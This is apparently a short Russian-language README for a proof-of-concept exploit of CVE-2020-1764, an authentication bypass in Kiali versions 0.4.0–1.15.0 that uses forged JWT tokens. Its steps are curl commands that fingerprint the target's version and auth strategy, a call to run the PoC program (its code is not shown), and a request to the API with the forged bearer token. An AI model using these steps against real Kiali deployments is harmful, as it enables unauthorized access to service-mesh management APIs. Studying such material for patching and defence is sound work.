
Эксплойт proof-of-concept для CVE-2020-1764 — обход аутентификации в Kiali 0.4.0–1.15.0, позволяющий несанкционированный доступ к API с помощью специально сформированных JWT-токенов.
PoC обхода аутентификации для Kiali версий 0.4.0 – 1.15.0 с использованием стратегии аутентификации через логин (Бюллетень безопасности)
проверка версии: curl 'http://<IP>/api
проверка стратегии аутентификации: curl 'http://<IP>/api/auth/info'
go run ./poc.go
curl 'http://<IP>/api/status' -H "Authorization: Bearer $JWT"